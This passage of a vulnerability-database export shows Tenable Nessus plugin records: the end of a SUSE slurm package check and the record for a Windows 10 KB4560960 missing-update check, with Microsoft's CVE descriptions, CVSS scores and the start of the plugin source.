value:\"p-cpe:/a:novell:suse_linux:libslurm32-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libslurm32-17.11.13-6.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libslurm32-debuginfo-17.11.13-6.31.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"slurm\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:15:17", "description": "The remote Windows host is missing security update 4560960. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows Diagnostics & feedback settings app handles objects in memory. An attacker who successfully exploited this vulnerability could cause additional diagnostic data from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a Windows service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1265, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1277, CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could cause a system to stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the Windows Spatial Data Service improperly handles objects in memory. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-1441)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1265", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348", "CVE-2020-1441"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4560960.NASL", "href": "https://www.tenable.com/plugins/nessus/137254", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137254);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1265\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1273\",\n \"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\",\n \"CVE-2020-1441\"\n );\n script_xref(name:\"MSKB\", value:\"4560960\");\n script_xref(name:\"MSFT\", value:\"MS20-4560960\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0300-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4560960. It is, \ntherefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An 